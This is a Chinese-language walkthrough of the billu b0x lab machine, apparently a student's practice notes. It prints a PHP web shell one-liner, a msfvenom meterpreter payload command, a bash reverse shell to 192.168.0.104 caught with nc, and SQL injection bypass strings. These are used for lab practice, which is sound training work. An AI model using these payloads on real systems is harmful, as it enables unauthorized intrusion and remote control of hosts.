billu b0x

信息收集

使用fping扫描存活主机,发现192.168.0.128

有80的乌班图搭建的服务、22的ssh端口

然后访问页面80

billu b0x

提示sql注入

找sql注入name的字典,注入,发现失败,可能过滤的跟正常的不一样

billu b0x

后来尝试sqlmap

也扫描失败

emm换条路

dirb使用大字典扫描,发现

billu b0x

尝试过后发现

/add
/test
c
/images/
/phpmy/    phpmyadmin的登录界面
phpmy/子目录
show
/in
/uploaded_images/
还有80的/index.php

尝试了/add

发现是一个静态网页,只是判断是否为文件,然后302跳转到还是/add

并且尝试上传jpg文件,发现在/images/或者/uploaded_images/都没有变化,更加验证网页的不行

换一个网页

发现/in的php版本的网站搭建的信息

之前访问c、show发现无法打开,空白,可能是没有权限

在\test访问网页,发现有file参数

尝试hackerbar的post传参

下载c、show的文件

下载c传参,自己下载panel.php,show也一样

billu b0x

打开发现文件引用的c.php,head2.php,并且发现了文件上传点,同时是白名单的上传,wap没有说是IIS多少,可能尝试配合解析漏洞

billu b0x

并且出现文件include文件包含,文件名为load

billu b0x

出现一个问题,无论下载c.php还是show的都是下载panel的,尝试换一个hackbar从而下载

billu b0x

AAA

在c.php发现数据库密码

billu b0x

发现账户密码

billu b0x

进行登录

在显示用户那,每一个上传的图片都会在这里显示

billu b0x

然后上传文件并用c32包含一句话

billu b0x

连不上

参考文章后

发现无法访问使用菜刀,因为是post请求,并且只能包含使用

上传cmd一句话

<?php system($_GET['cmd']); ?>

利用hacker请求

post

load=/uploaded_images/aa.jpg&continue=continue

billu b0x

可能字符有限,当前页面显示不出来,就用源代码查看

billu b0x

发现了好多php文件,可以一会再看

然后上传一句话到php文件

还有要注意编码在=后面的指令

从而来连接菜刀

BBB

通过目录扫描直到phpmy是主目录,然后猜测到/var/www/phpmy/里的配置文件config.inc.php

查看用户配置,从而直接远程连接ssh

billu b0x

CCC

msf监听

利用php文件进行

菜刀上传

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=   -f raw >a  .php

DDD

nc反弹获取shell

和上次的靶机差不多

echo ’bash -i >& /dev/tcp/192.168.0.104/6666 0>&1‘ | bash
bash -i : bash是Linux下一个常见的shell,-i参数表示产生一个交互式的shell
/dev/tcp|udp/ip/port是一个Linux中比较特殊的一个文件,如果在Linux*问就会发现这个文件并不存在,其含义是让主机与目标主机ip在端口port建立一个tcp或udp连接
记住就行

然后kali

nc -lvp 6666

su切换用户

不成功就用本地的su

python -c ‘import pty;pty.spawn(“/bin/bash”)’

EEE

下载开始的sql的index.php

然后根据对\和‘替换成空然后返回到变量

billu b0x

使用万能语句添加末尾\并进行逃逸

or 1=1 -- \
'or 1=1 -- \
等等

FFF

本想通过菜刀上传cs的文件

发现cs没有php监听的文件

就放弃了

其实想直接echo 追加覆盖,但url有限制对长度,所以失败

总结

看了大佬的文章,想对linux进行提权,但自己对此还不熟悉,今天下午再熟悉学习一下

参考链接:

https://www.jianshu.com/p/2a7f61bbd862?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

上一篇:findOne


下一篇:Vulnhub靶机实战-Billu_b0x